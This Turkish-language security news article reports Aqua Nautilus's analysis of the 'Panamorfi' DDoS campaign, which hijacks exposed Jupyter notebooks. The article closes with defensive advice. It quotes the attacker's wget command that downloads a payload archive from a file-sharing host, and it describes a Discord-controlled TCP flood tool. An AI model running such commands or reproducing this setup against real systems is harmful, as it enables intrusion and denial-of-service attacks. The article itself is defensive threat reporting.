Tehdit aktörü yawixooo tarafından yürütülen “Panamorfi” adlı yeni bir Dağıtılmış Hizmet Reddi (DDoS) saldırısı, çevrimiçi olarak ifşa edilen yanlış yapılandırılmış Jupyter not defterlerini istismar ediyor.
Saldırganlar, hedef sunucuları alt etmek amacıyla saldırı operasyonunu gerçekleştirmek için herkese açık bir Minecraft sunucusu DDoS aracını bir Discord kanalına dağıtır. Jupyter notebook’a güvenen veri mühendisleri, veri analistleri ve veri bilimcileri gibi veri uygulayıcılarının bu tür kampanyaların birincil kurbanları olduğu ve özel önlem almaları gerektiği düşünülmektedir.
Panamorfi Saldırısının Anatomisi
Aqua Nautilus’tan araştırmacılar, yawixooo tarafından hedef alınan ifşa edilmiş bir bal tuzağı Jupyter notebook kullanan saldırı operasyonunu bildirdi. Saldırının, tehdit aktörünün internete bakan notebooklara ilk erişimi elde etmesiyle başladığını, ardından bir dosya paylaşım platformundan bir zip dosyasını indirmek için bir komut çalıştırdığını gözlemlediler:
wget https://filebin.net/archive/h4fhifnlykw224h9/zip
Rastgele bir isme ve 42989a405c8d7c9cb68c323ae9a9a318 MD5 karma değerine sahip zip dosyası yaklaşık 17 MB boyutundadır ve iki Jar dosyası içerir. Bu dosyalar, conn.jar ve mineping.jar, Virus Total için yeniydi ve her dosya için bir güvenlik şirketinden yalnızca bir tespit vardı.
İlk yürütme kodunu içeren ‘conn.jar’ dosyası, DDoS saldırısını kontrol etmek için Discord’u kullanır. Kurbanın makinesi belirtilen Discord kanalına bağlanır ve ‘mineping.jar’ dosyasını yükler – GitHub’da bulunan bilinen bir Minecraft sunucusu DDoS aracıdır ve http soketlerinin yüklenmesini, proxy’lerin kullanımını, kurbanı boğma seçeneğini ve bağlantıyla ilgili ayrıntıların oluşturulmasını kolaylaştırmak için 12 java dosyası içerir.
Bu araç daha sonra hedef sunucunun kaynaklarını tüketmeyi amaçlayan bir TCP flood DDoS saldırısı başlatmak için kullanılır. Saldırganlar, sonuçları Discord kanalına yazacak şekilde aracı yapılandırmıştır.
Tehdit aktörü yawixooo, Minecraft sunucu yapılandırmasını ve şu anda yapım aşamasında olan bir web sitesini sürdürdükleri GitHub’da aktif bir varlığa sahip.
Saldırıya Karşı Önlemler
Araştırmacılar, conn.jar dosyasının çalışmasını engelleyen bir çalışma zamanı politikasıyla saldırının ilerlemesini başarıyla durdurabildiler. Bu fiili olarak tüm saldırıyı öldürür.
Bu tür kampanyalara karşı savunma yapmak için:
- Güvenli uygulamalarla Jupyter not defterlerine erişimi kısıtlayın.
- Kampanyayla ilişkili conn.jar ve mineping.jar gibi dosyaların çalışma zamanını engelleyin.
- Kod yürütmeyi sınırla
- Mevcut en son güvenlik yamalarıyla düzenli olarak güncelleyin.
Güvenlik araştırmacıları, tehdit aktörlerinin saldırıları için uygun hedefler olabilen Jupyter not defterlerinde hassas bilgilerin veya kimlik bilgilerinin paylaşılmasına karşı genel olarak uyarıda bulunmaktadır.